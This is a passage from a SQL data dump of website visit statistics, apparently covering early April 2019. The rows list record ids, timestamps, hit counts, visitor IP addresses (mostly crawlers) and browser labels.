2,2,0,0,'195.114.136.66','chrome'),(408891,1554270014,1,1,0,0,'54.36.148.166','other'),(408892,1554270092,1,1,0,0,'46.229.168.153','other'),(408893,1554270235,1,1,0,0,'66.249.64.29','chrome'),(408894,1554270494,1,1,0,0,'54.36.148.131','other'),(408895,1554270912,1,1,0,0,'54.36.150.161','other'),(408896,1554271017,2,2,0,0,'178.93.231.177','chrome'),(408897,1554271322,1,1,0,0,'66.249.64.62','chrome'),(408898,1554271514,1,1,0,0,'178.154.244.11','other'),(408899,1554271518,1,1,0,0,'54.36.148.64','other'),(408900,1554271899,1,1,0,0,'66.249.64.31','chrome'),(408901,1554271964,1,1,0,0,'66.249.64.30','chrome'),(408902,1554272002,1,1,0,0,'54.36.150.175','other'),(408903,1554272088,1,1,0,0,'54.36.150.35','other'),(408904,1554272295,1,1,0,0,'54.36.150.55','other'),(408905,1554272297,1,1,0,0,'91.196.178.77','chrome'),(408906,1554272322,1,1,0,0,'54.36.150.141','other'),(408907,1554272800,1,1,0,0,'207.46.13.43','other'),(408908,1554273146,1,1,0,0,'95.163.255.154','other'),(408909,1554273241,1,1,0,0,'54.36.149.67','other'),(408910,1554273434,1,1,0,0,'91.196.178.66','chrome'),(408911,1554273471,1,1,0,0,'40.77.167.46','other'),(408912,1554273537,1,1,0,0,'60.191.38.77','firefox'),(408913,1554273680,1,1,0,0,'54.36.148.102','other'),(408914,1554273878,1,1,0,0,'178.154.244.11','other'),(408915,1554273990,1,1,0,0,'207.46.13.22','other'),(408916,1554274310,1,1,0,0,'176.104.1.114','chrome'),(408917,1554274567,1,1,0,0,'66.249.64.29','chrome'),(408918,1554274923,1,1,0,0,'54.36.150.161','other'),(408919,1554275593,1,1,0,0,'54.36.150.95','other'),(408920,1554275639,1,1,0,0,'54.36.148.7','other'),(408921,1554276723,1,1,0,0,'8.29.198.26','other'),(408922,1554277068,1,1,0,0,'8.29.198.27','other'),(408923,1554277364,1,1,0,0,'54.36.149.44','other'),(408924,1554277534,1,1,0,0,'54.36.150.175','other'),(408925,1554277616,1,1,0,0,'66.249.64.62','chrome'),(408926,1554277830,1,1,0,0,'40.77.167.46','other'),(408927,1554278026,1,1,0,0,'54.36.150.94','other'),(408928,1554278229,1,1,0,0,'66.249.64.30','chrome'),(408929,1554278376,2,2,0,0,'91.196.178.130','firefox'),(408930,1554278905,1,1,0,0,'54.36.148.198','other'),(408931,1554278957,1,1,0,0,'54.36.149.16','other'),(408932,1554279171,1,1,0,0,'54.36.150.180','other'),(408933,1554279477,1,1,0,0,'46.229.168.137','other'),(408934,1554279484,1,1,0,0,'54.36.148.64','other'),(408935,1554279839,1,1,0,0,'40.77.167.46','other'),(408936,1554280063,1,1,0,0,'54.36.148.214','other'),(408937,1554280116,1,1,0,0,'95.163.255.95','other'),(408938,1554280262,1,1,0,0,'157.55.39.172','other'),(408939,1554280265,1,1,0,0,'66.249.64.62','chrome'),(408940,1554280293,1,1,0,0,'46.133.51.232','other'),(408941,1554280315,1,1,0,0,'54.36.150.93','other'),(408942,1554280431,1,1,0,0,'91.196.178.165','chrome'),(408943,1554280575,1,1,0,0,'54.36.148.66','other'),(408944,1554280738,1,1,0,0,'91.196.177.17','chrome'),(408945,1554281051,1,1,0,0,'46.229.168.136','other'),(408946,1554281166,1,1,0,0,'54.36.149.32','other'),(408947,1554281168,1,1,0,0,'54.36.148.16','other'),(408948,1554281216,1,1,0,0,'46.229.168.150','other'),(408949,1554281375,1,1,0,0,'54.36.149.93','other'),(408950,1554281645,1,1,0,0,'54.36.150.137','other'),(408951,1554282134,1,1,0,0,'66.249.64.62','chrome'),(408952,1554282325,1,1,0,0,'46.229.168.146','other'),(408953,1554282329,1,1,0,0,'66.249.64.29','chrome'),(408954,1554282459,1,1,0,0,'66.249.64.31','chrome'),(408955,1554282638,1,1,0,0,'46.229.168.130','other'),(408956,1554282677,1,1,0,0,'207.46.13.22','other'),(408957,1554282701,1,1,0,0,'40.77.167.46','other'),(408958,1554283120,1,1,0,0,'66.249.64.30','chrome'),(408959,1554283427,1,1,0,0,'95.108.213.4','other'),(408960,1554283669,1,1,0,0,'91.196.177.46','firefox'),(408961,1554283872,1,1,0,0,'178.95.247.170','chrome'),(408962,1554284026,1,1,0,0,'40.77.167.46','other'),(408963,1554284676,1,1,0,0,'54.36.148.156','other'),(408964,1554284893,1,1,0,0,'91.196.178.94','firefox'),(408965,1554285062,1,1,0,0,'5.45.207.19','other'),(408966,1554285094,1,1,0,0,'91.196.178.130','firefox'),(408967,1554285416,1,1,0,0,'54.36.149.31','other'),(408968,1554285427,1,1,0,0,'87.250.224.47','other'),(408969,1554285434,1,1,0,0,'66.249.64.31','chrome'),(408970,1554285507,1,1,0,0,'13.66.139.0','other'),(408971,1554285797,1,1,0,0,'180.163.220.5','other'),(408972,1554285862,1,1,0,0,'54.36.148.217','other'),(408973,1554286392,2,2,0,0,'95.213.141.126','opera'),(408974,1554286410,3,3,0,0,'207.46.13.89','other'),(408975,1554286533,1,1,0,0,'46.229.168.134','other'),(408976,1554286593,1,1,0,0,'46.229.168.154','other'),(408977,1554286655,1,1,0,0,'66.249.64.30','chrome'),(408978,1554286826,1,1,0,0,'54.36.149.55','other'),(408979,1554286916,1,1,0,0,'54.36.149.40','other'),(408980,1554287056,1,1,0,0,'54.36.149.13','other'),(408981,1554287432,1,1,0,0,'89.163.242.241','opera'),(408982,1554287439,1,1,0,0,'54.36.148.66','other'),(408983,1554287577,1,1,0,0,'8.29.198.27','other'),(408984,1554287690,1,1,0,0,'54.36.149.0','other'),(408985,1554287706,1,1,0,0,'54.36.148.200','other'),(408986,1554287917,1,1,0,0,'66.249.64.60','chrome'),(408987,1554287926,1,1,0,0,'8.29.198.25','other'),(408988,1554288333,1,1,0,0,'54.36.148.9','other'),(408989,1554288385,1,1,0,0,'54.36.148.146','other'),(408990,1554288753,1,1,0,0,'54.36.150.166','other'),(408991,1554288775,1,1,0,0,'54.36.148.0','other'),(408992,1554288825,1,1,0,0,'207.46.13.89','other'),(408993,1554288945,1,1,0,0,'54.36.148.184','other'),(408994,1554288992,1,1,0,0,'40.77.167.82','other'),(408995,1554290040,1,1,0,0,'54.36.148.121','other'),(408996,1554290054,1,1,0,0,'66.249.66.82','chrome'),(408997,1554290139,1,1,0,0,'54.36.148.147','other'),(408998,1554290785,1,1,0,0,'54.36.150.133','other'),(408999,1554290847,1,1,0,0,'91.124.182.170','firefox'),(409000,1554290910,1,1,0,0,'178.95.67.7','chrome'),(409001,1554290976,1,1,0,0,'54.36.150.101','other'),(409002,1554291079,1,1,0,0,'66.249.66.83','chrome'),(409003,1554291105,1,1,0,0,'66.249.66.68','chrome'),(409004,1554291135,1,1,0,0,'54.36.149.14','other'),(409005,1554291264,1,1,0,0,'54.36.148.125','other'),(409006,1554291560,1,1,0,0,'157.55.39.149','other'),(409007,1554291812,1,1,0,0,'54.36.150.39','other'),(409008,1554292123,2,2,0,0,'5.45.207.19','other'),(409009,1554292604,3,3,0,0,'5.45.207.79','other'),(409010,1554292718,1,1,0,0,'178.154.244.11','other'),(409011,1554292808,1,1,0,0,'54.36.148.199','other'),(409012,1554293015,1,1,0,0,'95.108.213.4','other'),(409013,1554293834,1,1,0,0,'216.244.66.241','other'),(409014,1554294132,1,1,0,0,'46.229.168.138','other'),(409015,1554294331,1,1,0,0,'46.229.168.143','other'),(409016,1554294545,1,1,0,0,'54.36.150.43','other'),(409017,1554294633,1,1,0,0,'54.36.150.102','other'),(409018,1554294768,1,1,0,0,'54.36.148.194','other'),(409019,1554294876,1,1,0,0,'91.196.178.66','chrome'),(409020,1554294973,1,1,0,0,'46.229.168.135','other'),(409021,1554295103,1,1,0,0,'66.249.66.222','chrome'),(409022,1554295165,1,1,0,0,'128.72.159.196','msie'),(409023,1554295568,1,1,0,0,'46.229.168.143','other'),(409024,1554296224,1,1,0,0,'46.229.168.149','other'),(409025,1554296560,1,1,0,0,'66.249.66.83','chrome'),(409026,1554296889,1,1,0,0,'91.196.178.129','chrome'),(409027,1554296994,2,2,0,0,'157.55.39.149','other'),(409028,1554297218,1,1,0,0,'46.229.168.133','other'),(409029,1554297607,1,1,0,0,'66.249.66.83','chrome'),(409030,1554297813,1,1,0,0,'66.249.66.220','chrome'),(409031,1554297826,1,1,0,0,'66.249.66.130','chrome'),(409032,1554298125,1,1,0,0,'54.36.150.102','other'),(409033,1554298420,1,1,0,0,'8.29.198.25','other'),(409034,1554298581,1,1,0,0,'91.196.178.66','chrome'),(409035,1554298799,1,1,0,0,'8.29.198.27','other'),(409036,1554299450,1,1,0,0,'40.77.167.82','other'),(409037,1554299498,1,1,0,0,'66.249.66.83','chrome'),(409038,1554299671,1,1,0,0,'40.77.167.20','other'),(409039,1554299678,1,1,0,0,'66.249.66.218','chrome'),(409040,1554300063,1,1,0,0,'157.55.39.149','other'),(409041,1554300562,1,1,0,0,'5.196.87.175','other'),(409042,1554300652,1,1,0,0,'54.36.150.14','other'),(409043,1554300882,1,1,0,0,'66.249.66.128','chrome'),(409044,1554300948,1,1,0,0,'66.249.66.132','chrome'),(409045,1554301049,1,1,0,0,'66.249.66.218','chrome'),(409046,1554301094,1,1,0,0,'54.36.148.76','other'),(409047,1554301263,1,1,0,0,'54.36.148.220','other'),(409048,1554301429,1,1,0,0,'54.36.148.108','other'),(409049,1554301591,1,1,0,0,'46.229.168.130','other'),(409050,1554301636,1,1,0,0,'93.73.173.105','chrome'),(409051,1554301765,1,1,0,0,'157.55.39.224','other'),(409052,1554301841,1,1,0,0,'66.249.66.222','chrome'),(409053,1554302239,1,1,0,0,'66.249.66.220','chrome'),(409054,1554302250,1,1,0,0,'54.36.149.35','other'),(409055,1554302251,1,1,0,0,'66.249.66.218','chrome'),(409056,1554302349,1,1,0,0,'54.36.148.141','other'),(409057,1554302575,1,1,0,0,'46.119.247.206','chrome'),(409058,1554303155,1,1,0,0,'54.36.150.164','other'),(409059,1554303305,1,1,0,0,'77.222.143.222','chrome'),(409060,1554303380,1,1,0,0,'54.36.149.7','other'),(409061,1554303507,1,1,0,0,'54.36.150.101','other'),(409062,1554303616,2,2,0,0,'66.249.66.220','chrome'),(409063,1554303812,1,1,0,0,'87.250.224.47','other'),(409064,1554303974,1,1,0,0,'91.196.178.46','chrome'),(409065,1554304012,1,1,0,0,'54.36.150.27','other'),(409066,1554304388,1,1,0,0,'91.196.178.46','firefox'),(409067,1554304817,1,1,0,0,'46.229.168.130','other'),(409068,1554305565,2,2,0,0,'66.249.66.218','chrome'),(409069,1554305636,1,1,0,0,'66.249.66.222','chrome'),(409070,1554306192,1,1,0,0,'54.36.148.89','other'),(409071,1554306850,1,1,0,0,'157.55.39.224','other'),(409072,1554307263,1,1,0,0,'66.249.66.222','chrome'),(409073,1554308298,1,1,0,0,'157.55.39.149','other'),(409074,1554308415,1,1,0,0,'66.249.66.220','chrome'),(409075,1554308518,1,1,0,0,'66.249.66.128','chrome'),(409076,1554308635,1,1,0,0,'66.249.66.130','chrome'),(409077,1554308700,1,1,0,0,'54.36.150.44','other'),(409078,1554308725,1,1,0,0,'54.36.150.8','other'),(409079,1554308852,1,1,0,0,'40.77.167.25','other'),(409080,1554309121,1,1,0,0,'91.196.178.66','firefox'),(409081,1554309273,1,1,0,0,'8.29.198.25','other'),(409082,1554309373,1,1,0,0,'66.249.66.222','chrome'),(409083,1554309654,1,1,0,0,'8.29.198.27','other'),(409084,1554309980,1,1,0,0,'77.222.143.222','chrome'),(409085,1554310068,1,1,0,0,'46.229.168.148','other'),(409086,1554310136,4,4,0,0,'66.249.66.220','chrome'),(409087,1554310864,1,1,0,0,'193.106.30.98','firefox'),(409088,1554311002,1,1,0,0,'157.55.39.12','other'),(409089,1554311012,1,1,0,0,'54.36.148.241','other'),(409090,1554311014,2,2,0,0,'66.249.66.218','chrome'),(409091,1554311020,1,1,0,0,'54.36.148.242','other'),(409092,1554311079,2,2,0,0,'66.249.66.220','chrome'),(409093,1554311117,2,2,0,0,'66.249.66.132','chrome'),(409094,1554312056,1,1,0,0,'66.249.66.220','chrome'),(409095,1554312438,3,3,0,0,'5.45.207.79','other'),(409096,1554312532,2,2,0,0,'66.249.66.218','chrome'),(409097,1554312669,1,1,0,0,'54.36.148.142','other'),(409098,1554312699,1,1,0,0,'66.249.66.130','chrome'),(409099,1554312772,1,1,0,0,'178.154.244.11','other'),(409100,1554312820,1,1,0,0,'5.45.207.19','other'),(409101,1554313198,1,1,0,0,'141.8.142.103','other'),(409102,1554313307,1,1,0,0,'157.55.39.12','other'),(409103,1554313342,2,2,0,0,'157.55.39.149','other'),(409104,1554313933,1,1,0,0,'46.229.168.140','other'),(409105,1554314081,2,2,0,0,'207.46.13.98','other'),(409106,1554314549,1,1,0,0,'54.36.149.66','other'),(409107,1554315073,1,1,0,0,'54.36.150.77','other'),(409108,1554315565,1,1,0,0,'46.229.168.150','other'),(409109,1554315867,1,1,0,0,'54.36.150.72','other'),(409110,1554315943,43,43,0,0,'144.76.56.124','other'),(409111,1554316065,1,1,0,0,'46.211.110.101','chrome'),(409112,1554316331,1,1,0,0,'54.36.148.57','other'),(409113,1554316528,1,1,0,0,'54.36.149.36','other'),(409114,1554316547,1,1,0,0,'157.55.39.206','other'),(409115,1554316606,1,1,0,0,'46.229.168.138','other'),(409116,1554316670,6,6,0,0,'69.197.177.50','other'),(409117,1554316930,1,1,0,0,'54.36.150.53','other'),(409118,1554317171,1,1,0,0,'54.36.149.61','other'),(409119,1554318252,1,1,0,0,'54.36.149.13','other'),(409120,1554318505,1,1,0,0,'54.36.149.41','other'),(409121,1554319128,1,1,0,0,'54.36.148.109','other'),(409122,1554319654,1,1,0,0,'46.229.168.162','other'),(409123,1554319977,1,1,0,0,'54.36.149.26','other'),(409124,1554320116,1,1,0,0,'8.29.198.25','other'),(409125,1554320297,1,1,0,0,'66.249.66.218','chrome'),(409126,1554320431,1,1,0,0,'54.36.148.212','other'),(409127,1554320505,2,2,0,0,'207.46.13.98','other'),(409128,1554320510,1,1,0,0,'8.29.198.27','other'),(409129,1554320514,1,1,0,0,'66.249.66.222','chrome'),(409130,1554320515,1,1,0,0,'54.36.149.15','other'),(409131,1554320634,1,1,0,0,'40.77.167.36','other'),(409132,1554320815,1,1,0,0,'46.229.168.147','other'),(409133,1554321145,2,2,0,0,'66.249.66.220','chrome'),(409134,1554321519,1,1,0,0,'66.249.66.218','chrome'),(409135,1554322388,1,1,0,0,'66.249.66.220','chrome'),(409136,1554322451,1,1,0,0,'54.36.150.168','other'),(409137,1554322903,1,1,0,0,'95.163.255.95','other'),(409138,1554323361,2,2,0,0,'207.46.13.98','other'),(409139,1554323365,4,4,0,0,'157.55.39.12','other'),(409140,1554323371,2,2,0,0,'157.55.39.206','other'),(409141,1554323377,9,9,0,0,'40.77.167.36','other'),(409142,1554323548,2,2,0,0,'87.250.224.64','other'),(409143,1554323859,1,1,0,0,'46.229.168.134','other'),(409144,1554323864,1,1,0,0,'54.36.150.98','other'),(409145,1554323886,1,1,0,0,'66.249.66.130','chrome'),(409146,1554324413,1,1,0,0,'54.36.150.75','other'),(409147,1554324580,1,1,0,0,'54.36.148.98','other'),(409148,1554324881,1,1,0,0,'54.36.150.141','other'),(409149,1554325091,1,1,0,0,'54.36.150.64','other'),(409150,1554325123,1,1,0,0,'157.55.39.181','other'),(409151,1554325644,1,1,0,0,'54.36.148.237','other'),(409152,1554325961,1,1,0,0,'46.229.168.149','other'),(409153,1554326244,1,1,0,0,'157.55.39.181','other'),(409154,1554326434,1,1,0,0,'54.36.148.82','other'),(409155,1554326544,1,1,0,0,'54.36.150.52','other'),(409156,1554326769,1,1,0,0,'66.249.66.220','chrome'),(409157,1554326960,1,1,0,0,'54.36.149.22','other'),(409158,1554327259,1,1,0,0,'46.229.168.147','other'),(409159,1554327781,1,1,0,0,'46.229.168.137','other'),(409160,1554327783,1,1,0,0,'54.36.148.167','other'),(409161,1554328168,1,1,0,0,'40.77.167.36','other'),(409162,1554328405,1,1,0,0,'95.163.255.96','other'),(409163,1554328426,2,2,0,0,'207.46.13.87','other'),(409164,1554328432,1,1,0,0,'46.229.168.139','other'),(409165,1554328816,1,1,0,0,'54.36.150.155','other'),(409166,1554328899,1,0,1,0,'66.249.66.218',''),(409167,1554329174,1,1,0,0,'54.36.150.32','other'),(409168,1554329772,1,1,0,0,'54.36.150.142','other'),(409169,1554330107,1,1,0,0,'66.249.66.218','chrome'),(409170,1554330224,1,1,0,0,'95.163.255.192','other'),(409171,1554330383,1,1,0,0,'46.229.168.152','other'),(409172,1554330904,1,1,0,0,'54.36.150.188','other'),(409173,1554330957,1,1,0,0,'8.29.198.25','other'),(409174,1554331022,1,1,0,0,'54.36.149.41','other'),(409175,1554331124,1,1,0,0,'46.229.168.130','other'),(409176,1554331371,1,1,0,0,'8.29.198.27','other'),(409177,1554331640,2,2,0,0,'66.249.66.222','chrome'),(409178,1554331731,1,1,0,0,'46.229.168.135','other'),(409179,1554332651,2,2,0,0,'207.46.13.87','other'),(409180,1554333156,1,1,0,0,'66.249.66.218','chrome'),(409181,1554333270,1,1,0,0,'54.36.149.79','other'),(409182,1554333451,1,1,0,0,'66.249.66.222','chrome'),(409183,1554333737,1,1,0,0,'54.36.148.184','other'),(409184,1554333907,1,1,0,0,'54.36.150.168','other'),(409185,1554334008,1,1,0,0,'46.229.168.154','other'),(409186,1554334643,1,1,0,0,'95.163.255.98','other'),(409187,1554334760,1,1,0,0,'54.36.148.93','other'),(409188,1554334794,1,1,0,0,'46.229.168.151','other'),(409189,1554334916,1,1,0,0,'54.36.148.134','other'),(409190,1554335396,1,1,0,0,'54.36.150.159','other'),(409191,1554335735,1,1,0,0,'54.36.148.39','other'),(409192,1554335876,1,1,0,0,'46.229.168.138','other'),(409193,1554335967,1,1,0,0,'95.163.255.170','other'),(409194,1554336006,2,2,0,0,'157.55.39.193','other'),(409195,1554336082,1,1,0,0,'66.249.66.220','chrome'),(409196,1554336104,1,1,0,0,'54.36.149.26','other'),(409197,1554336366,1,1,0,0,'54.36.150.163','other'),(409198,1554336419,1,1,0,0,'54.36.148.5','other'),(409199,1554336924,1,1,0,0,'54.36.148.16','other'),(409200,1554337079,1,1,0,0,'46.229.168.132','other'),(409201,1554337385,1,1,0,0,'157.55.39.193','other'),(409202,1554337497,2,2,0,0,'66.249.66.130','chrome'),(409203,1554337555,2,2,0,0,'66.249.66.218','chrome'),(409204,1554337992,1,1,0,0,'66.249.66.220','chrome'),(409205,1554338062,1,1,0,0,'54.36.150.134','other'),(409206,1554338244,1,1,0,0,'46.229.168.151','other'),(409207,1554338600,1,1,0,0,'54.36.148.249','other'),(409208,1554338905,1,1,0,0,'54.36.148.94','other'),(409209,1554339514,1,1,0,0,'54.36.150.144','other'),(409210,1554339575,1,1,0,0,'54.36.148.73','other'),(409211,1554339708,1,1,0,0,'54.36.149.52','other'),(409212,1554339858,1,1,0,0,'66.249.66.132','chrome'),(409213,1554340084,1,1,0,0,'66.249.66.222','chrome'),(409214,1554340090,2,2,0,0,'66.249.66.218','chrome'),(409215,1554340160,1,1,0,0,'40.77.167.105','other'),(409216,1554340722,1,1,0,0,'91.209.11.236','other'),(409217,1554340729,1,1,0,0,'54.36.150.130','other'),(409218,1554340948,1,1,0,0,'46.229.168.144','other'),(409219,1554341101,1,1,0,0,'52.53.201.78','chrome'),(409220,1554341111,1,1,0,0,'54.36.148.56','other'),(409221,1554341333,1,1,0,0,'54.36.148.49','other'),(409222,1554341491,2,2,0,0,'66.249.66.218','chrome'),(409223,1554341497,1,1,0,0,'54.36.148.68','other'),(409224,1554341572,1,1,0,0,'46.229.168.146','other'),(409225,1554341751,1,1,0,0,'46.229.168.148','other'),(409226,1554341789,1,1,0,0,'54.36.148.145','other'),(409227,1554341795,1,1,0,0,'8.29.198.27','other'),(409228,1554341841,1,1,0,0,'95.163.255.174','other'),(409229,1554341848,1,1,0,0,'46.229.168.161','other'),(409230,1554342110,1,1,0,0,'54.36.149.46','other'),(409231,1554342234,1,1,0,0,'8.29.198.26','other'),(409232,1554342450,1,1,0,0,'54.36.150.154','other'),(409233,1554342588,1,1,0,0,'5.188.210.51','chrome'),(409234,1554343006,1,1,0,0,'95.108.181.75','other'),(409235,1554343595,1,1,0,0,'54.36.150.175','other'),(409236,1554343607,1,1,0,0,'54.36.149.87','other'),(409237,1554343646,1,1,0,0,'54.36.149.57','other'),(409238,1554343834,1,1,0,0,'95.108.213.4','other'),(409239,1554344158,1,1,0,0,'46.229.168.145','other'),(409240,1554344159,1,1,0,0,'5.45.207.8','other'),(409241,1554344163,1,1,0,0,'178.154.171.27','other'),(409242,1554344166,1,1,0,0,'213.180.203.40','other'),(409243,1554344232,2,2,0,0,'34.222.111.86','chrome'),(409244,1554344261,1,1,0,0,'207.46.13.64','other'),(409245,1554344294,1,1,0,0,'37.9.113.148','other'),(409246,1554344570,1,1,0,0,'5.188.210.44','chrome'),(409247,1554345386,3,3,0,0,'66.249.66.222','chrome'),(409248,1554345922,1,1,0,0,'66.249.66.128','chrome'),(409249,1554346024,1,1,0,0,'111.199.186.87','chrome'),(409250,1554346104,1,1,0,0,'66.249.66.218','chrome'),(409251,1554346145,1,1,0,0,'95.163.255.93','other'),(409252,1554346370,1,1,0,0,'54.36.149.31','other'),(409253,1554346422,1,1,0,0,'54.36.148.211','other'),(409254,1554346450,1,1,0,0,'95.163.255.96','other'),(409255,1554346538,1,1,0,0,'109.74.154.72','chrome'),(409256,1554346899,1,1,0,0,'66.249.66.222','chrome'),(409257,1554347085,1,1,0,0,'54.36.148.35','other'),(409258,1554347144,1,1,0,0,'54.36.149.78','other'),(409259,1554347217,122,122,0,0,'5.9.61.101','other'),(409260,1554347268,1,1,0,0,'54.36.150.61','other'),(409261,1554347375,1,1,0,0,'178.171.6.49','chrome'),(409262,1554347554,1,1,0,0,'54.36.150.137','other'),(409263,1554347691,1,1,0,0,'95.163.255.175','other'),(409264,1554347770,1,1,0,0,'95.163.255.152','other'),(409265,1554347775,1,1,0,0,'95.163.255.173','other'),(409266,1554347886,1,1,0,0,'54.36.148.47','other'),(409267,1554348077,1,1,0,0,'54.36.150.126','other'),(409268,1554348530,1,1,0,0,'54.36.148.93','other'),(409269,1554348966,1,1,0,0,'54.36.148.110','other'),(409270,1554349000,1,1,0,0,'46.229.168.151','other'),(409271,1554349304,1,1,0,0,'54.36.150.66','other'),(409272,1554349399,1,1,0,0,'54.36.150.131','other'),(409273,1554349416,1,1,0,0,'54.36.150.121','other'),(409274,1554349453,1,1,0,0,'54.36.150.4','other'),(409275,1554349606,1,1,0,0,'40.77.167.105','other'),(409276,1554350165,1,1,0,0,'66.249.66.222','chrome'),(409277,1554350265,1,1,0,0,'46.229.168.138','other'),(409278,1554350424,1,1,0,0,'46.229.168.142','other'),(409279,1554350652,1,1,0,0,'54.36.148.182','other'),(409280,1554350678,1,1,0,0,'54.36.150.144','other'),(409281,1554351501,1,1,0,0,'66.249.66.218','chrome'),(409282,1554351767,1,1,0,0,'207.46.13.116','other'),(409283,1554351961,1,1,0,0,'54.36.150.145','other'),(409284,1554352138,1,1,0,0,'95.163.255.180','other'),(409285,1554352142,1,1,0,0,'54.36.150.55','other'),(409286,1554352219,1,1,0,0,'54.36.150.53','other'),(409287,1554352374,1,1,0,0,'95.163.255.98','other'),(409288,1554352641,1,1,0,0,'8.29.198.27','other'),(409289,1554352737,1,1,0,0,'51.255.65.46','other'),(409290,1554352834,4,4,0,0,'66.249.66.218','chrome'),(409291,1554353038,1,1,0,0,'54.36.150.141','other'),(409292,1554353084,1,1,0,0,'8.29.198.26','other'),(409293,1554353136,1,1,0,0,'54.36.148.76','other'),(409294,1554353206,3,3,0,0,'207.46.13.142','other'),(409295,1554353271,1,1,0,0,'54.36.148.127','other'),(409296,1554353424,1,1,0,0,'54.36.150.150','other'),(409297,1554353558,1,1,0,0,'54.36.150.26','other'),(409298,1554353816,1,1,0,0,'66.249.66.218','chrome'),(409299,1554354167,1,1,0,0,'141.8.142.103','other'),(409300,1554354173,1,1,0,0,'91.196.178.132','chrome'),(409301,1554354231,2,2,0,0,'5.45.207.79','other'),(409302,1554354304,1,1,0,0,'207.46.13.116','other'),(409303,1554354500,2,2,0,0,'178.154.244.11','other'),(409304,1554355116,1,1,0,0,'5.45.207.19','other'),(409305,1554355509,1,1,0,0,'54.36.150.9','other'),(409306,1554355799,2,2,0,0,'5.45.207.79','other'),(409307,1554355929,1,1,0,0,'185.220.102.6','other'),(409308,1554356081,1,1,0,0,'157.55.39.193','other'),(409309,1554356607,1,1,0,0,'54.36.149.88','other'),(409310,1554356621,2,2,0,0,'66.249.66.220','chrome'),(409311,1554356713,1,1,0,0,'54.36.148.76','other'),(409312,1554356740,1,1,0,0,'54.36.150.31','other'),(409313,1554356885,1,1,0,0,'54.36.149.92','other'),(409314,1554357034,1,1,0,0,'157.55.39.193','other'),(409315,1554357059,1,1,0,0,'66.249.66.130','chrome'),(409316,1554357258,1,1,0,0,'66.249.66.83','chrome'),(409317,1554357313,1,1,0,0,'54.36.148.57','other'),(409318,1554357506,1,1,0,0,'54.36.150.96','other'),(409319,1554357738,1,1,0,0,'91.196.178.66','chrome'),(409320,1554357766,1,1,0,0,'54.36.150.63','other'),(409321,1554358093,1,1,0,0,'54.36.150.5','other'),(409322,1554358367,1,1,0,0,'104.130.24.129','chrome'),(409323,1554358558,1,1,0,0,'66.249.66.220','chrome'),(409324,1554358808,1,1,0,0,'66.249.66.83','chrome'),(409325,1554358847,2,2,0,0,'66.249.66.218','chrome'),(409326,1554359000,1,1,0,0,'157.55.39.193','other'),(409327,1554359228,1,1,0,0,'46.229.168.152','other'),(409328,1554359437,1,1,0,0,'66.249.66.222','chrome'),(409329,1554360234,1,1,0,0,'54.36.150.156','other'),(409330,1554360391,1,1,0,0,'157.55.39.198','other'),(409331,1554360485,1,1,0,0,'207.46.13.142','other'),(409332,1554361111,1,1,0,0,'54.36.149.61','other'),(409333,1554361789,1,1,0,0,'54.36.148.184','other'),(409334,1554361794,1,1,0,0,'46.229.168.149','other'),(409335,1554362321,1,1,0,0,'54.36.149.45','other'),(409336,1554362370,1,1,0,0,'46.229.168.137','other'),(409337,1554362662,1,1,0,0,'66.249.66.132','chrome'),(409338,1554362777,1,1,0,0,'66.249.66.81','chrome'),(409339,1554363202,1,1,0,0,'54.36.149.34','other'),(409340,1554363442,1,1,0,0,'54.36.148.226','other'),(409341,1554363475,2,2,0,0,'8.29.198.26','other'),(409342,1554363527,1,1,0,0,'54.36.150.144','other'),(409343,1554363700,1,1,0,0,'95.163.255.99','other'),(409344,1554363746,1,1,0,0,'207.46.13.156','other'),(409345,1554363883,1,1,0,0,'46.229.168.162','other'),(409346,1554363974,1,1,0,0,'95.163.255.93','other'),(409347,1554364572,1,1,0,0,'193.189.127.179','opera'),(409348,1554364985,1,1,0,0,'207.46.13.142','other'),(409349,1554364996,1,1,0,0,'46.229.168.148','other'),(409350,1554365156,1,1,0,0,'54.36.148.108','other'),(409351,1554365259,1,1,0,0,'95.163.255.190','other'),(409352,1554365349,1,1,0,0,'54.36.148.232','other'),(409353,1554365357,1,1,0,0,'54.36.150.1','other'),(409354,1554365386,1,1,0,0,'157.55.39.198','other'),(409355,1554365433,1,1,0,0,'54.36.149.57','other'),(409356,1554365692,1,1,0,0,'54.36.150.158','other'),(409357,1554365713,1,1,0,0,'109.251.210.100','chrome'),(409358,1554365972,1,1,0,0,'95.163.255.180','other'),(409359,1554366037,1,1,0,0,'66.249.66.220','chrome'),(409360,1554366049,1,1,0,0,'193.189.127.179','firefox'),(409361,1554366677,1,1,0,0,'54.36.148.226','other'),(409362,1554366726,2,2,0,0,'141.8.142.103','other'),(409363,1554366794,2,2,0,0,'5.45.207.19','other'),(409364,1554366928,1,1,0,0,'46.229.168.134','other'),(409365,1554366933,1,1,0,0,'54.36.150.183','other'),(409366,1554366985,1,1,0,0,'54.36.148.52','other'),(409367,1554367001,2,2,0,0,'91.196.178.67','chrome'),(409368,1554367126,1,1,0,0,'91.196.178.66','chrome'),(409369,1554367163,1,1,0,0,'54.36.150.179','other'),(409370,1554367171,1,1,0,0,'54.36.149.104','other'),(409371,1554367192,1,1,0,0,'87.250.224.47','other'),(409372,1554367350,1,1,0,0,'178.154.244.11','other'),(409373,1554367552,1,1,0,0,'66.249.66.83','chrome'),(409374,1554367627,1,1,0,0,'66.249.66.220','chrome'),(409375,1554367715,1,1,0,0,'46.229.168.154','other'),(409376,1554367718,1,1,0,0,'46.229.168.152','other'),(409377,1554367836,1,1,0,0,'180.76.15.161','other'),(409378,1554368163,1,1,0,0,'66.249.66.222','chrome'),(409379,1554368314,1,1,0,0,'66.249.66.218','chrome'),(409380,1554368614,1,1,0,0,'54.36.150.53','other'),(409381,1554368811,1,1,0,0,'91.196.178.66','chrome'),(409382,1554368915,1,1,0,0,'66.249.66.128','chrome'),(409383,1554369181,1,1,0,0,'54.36.148.45','other'),(409384,1554369278,1,1,0,0,'46.229.168.150','other'),(409385,1554369491,2,2,0,0,'66.249.66.218','chrome'),(409386,1554369521,1,1,0,0,'54.36.149.107','other'),(409387,1554369633,1,1,0,0,'66.249.66.132','chrome'),(409388,1554370501,1,1,0,0,'46.229.168.150','other'),(409389,1554370605,1,1,0,0,'5.45.207.19','other'),(409390,1554370891,2,2,0,0,'66.249.66.220','chrome'),(409391,1554370916,1,1,0,0,'142.93.74.183','other'),(409392,1554370938,1,1,0,0,'54.36.149.101','other'),(409393,1554370956,1,1,0,0,'134.209.39.219','other'),(409394,1554370998,1,1,0,0,'207.46.13.24','other'),(409395,1554371045,1,1,0,0,'87.250.224.47','other'),(409396,1554371734,1,1,0,0,'66.249.66.222','chrome'),(409397,1554371765,1,1,0,0,'109.207.207.156','chrome'),(409398,